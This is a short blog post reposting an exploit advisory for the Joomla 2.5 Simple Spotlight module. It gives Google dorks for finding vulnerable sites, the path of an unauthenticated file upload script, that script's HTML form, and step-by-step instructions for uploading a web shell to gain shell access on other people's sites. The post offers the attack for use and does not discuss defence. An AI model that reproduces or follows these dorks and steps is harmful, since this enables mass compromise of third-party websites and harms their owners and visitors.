Sunday, January 22, 2017
Joomla 2 5 Modules Simple Spotlight Upload Shell Old 3xploi7
Joomla 2 5 Modules Simple Spotlight Upload Shell Old 3xploi7
#- Title: Joomla 2.5 Modules Simple Spotlight Upload Shell
#- Author: BL4ckc0d1n6
#- Published : 3-22-2012
#- Developer : joomla
#- Link Download : extensions.joomla .org/extension/simple-spotlight
#- Price : Free
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Simple spotlight is a jQuery image rotator with navigation. You can have up to 20 images with links. You can turn off the navigation and choose between 27 effects for transition. It also has 5 button styles and a shadow effect.
Vulnerability :
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php
Result : 13k +
When Vuln :
iSource :
<script language="JavaScript">
function refreshParent() {
window.close();
if (window.opener && !window.opener.closed) {
window.opener.location.reload();
}
}
</script>
<form name="newad" method="post" enctype="multipart/form-data" action="">
<table>
<tr>
<td>
<input type="file" name="image">
</td>
</tr>
<tr>
<td>
<input name="Submit" type="submit" value="Upload image">
<input type="button" value="Close" onclick="javascript: refreshParent()">
</td>
</tr>
</table>
</form>
~ Method ~
1. Site .com
2. add 3xploi7 = /modules/mod_ppc_simple_spotlight/elements/upload_file.php
3. Ex : Site .com/modules/mod_ppc_simple_spotlight/elements/upload_file.php
4. Upload your shell / imges / html file
If Succesfully >
Shell Acces ? Click Here
Available link for download
